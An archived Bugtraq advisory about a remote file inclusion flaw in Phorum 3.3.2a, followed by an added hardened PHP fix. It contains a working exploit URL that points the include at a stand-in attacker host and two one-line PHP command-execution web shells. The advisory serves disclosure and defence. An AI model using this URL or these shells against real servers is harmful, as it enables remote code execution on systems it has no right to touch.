Bugtraq mailing list archives
Phorum 3.3.2a remote command execution
From: Markus Arndt <markus-arndt () web de>
Date: Fri, 17 May 2002 20:26:40 +0200
Target: Phorum 3.3.2a (prior versions?)

Description: In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users include external php scripts and execute arbitrary code.

Found by: Markus Arndt <markus-arndt () web de>

Vendor: http://www.phorum.org

Notified Vendor: Yes, already fixed version available

Details:

After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders. I just snooped around a bit and found this file vulnerable to remote script inclusion:

    ./plugin/replace/plugin.php

Let's see some code:

    <?php
    include("$PHORUM[settings_dir]/replace.php");

    function mod_replace_read_body ($body) {
        global $pluginreplace;
        reset($pluginreplace);
        while(list($key,$val) = each($pluginreplace)) {
            $body = str_replace($key,$val,$body);
        }
        return $body;
    }

    $plugins["read_body"]["mod_replace"]="mod_replace_read_body";
    ?>

Easy one..

    http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

This one will get the file http://[evilhost]/replace.php and execute it. If [evilhost] has php enabled we could use this one as replace.php:

    <? echo("<? system(\"\$cmd\"); ?>"); ?>

If it's not php-enabled simply:

    <? system("$cmd"); ?>

Markus Arndt <markus-arndt () web de>
http://skka.de
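As an added example (not Phorum's own fix and not code from the post), here is a hardened form of that include for modern PHP: the settings directory comes from a constant set in local configuration rather than from `$PHORUM`, which register_globals let a request parameter populate, and the resolved path is checked before anything is included. The constant name PHORUM_SETTINGS_DIR and the helper function name are assumptions.

```php
<?php
// Added hardening example, not Phorum's code. PHORUM_SETTINGS_DIR is an
// assumed name for a value that lives in local configuration only.
define('PHORUM_SETTINGS_DIR', __DIR__ . '/../../settings');

/**
 * Resolve a settings file name inside a fixed base directory.
 * Returns the absolute path, or null if the name or the resolved
 * location is not acceptable (URL schemes, traversal, symlink escapes).
 */
function phorum_safe_settings_file(string $baseDir, string $name): ?string
{
    // Only a plain file name is allowed: no '/', no '..', no 'http://'.
    if (!preg_match('/^[A-Za-z0-9_]+\.php$/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    // realpath() fails for missing files and follows symlinks, so the
    // result is what will actually be opened; it must stay under $base.
    if ($base === false || $path === false) {
        return null;
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Vulnerable original from the post, for comparison (do not use):
//   include("$PHORUM[settings_dir]/replace.php");
// With register_globals on, ?PHORUM[settings_dir]=http://... sets the
// array element from the query string before this line runs.

// Hardened: fixed directory, fixed file name, validated resolved path.
$settings = phorum_safe_settings_file(PHORUM_SETTINGS_DIR, 'replace.php');
if ($settings === null) {
    // Fail closed: a plugin that cannot load its settings does nothing.
    return;
}
include $settings;
```

With `register_globals = Off` and `allow_url_include = Off` (on PHP 4, `allow_url_fopen = Off`) in php.ini, a request cannot populate `$PHORUM` at all and include() refuses remote URLs, but the path check above still matters whenever the directory value can come from any mutable source.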
Current thread:
- Phorum 3.3.2a remote command execution Markus Arndt (May 17)
- Re: Phorum 3.3.2a remote command execution Gabriel A. Maggiotti (May 18)
- Re: Phorum 3.3.2a remote command execution Thomas Seifert (May 20)
- Re: Phorum 3.3.2a remote command execution Gabriel A. Maggiotti (May 18)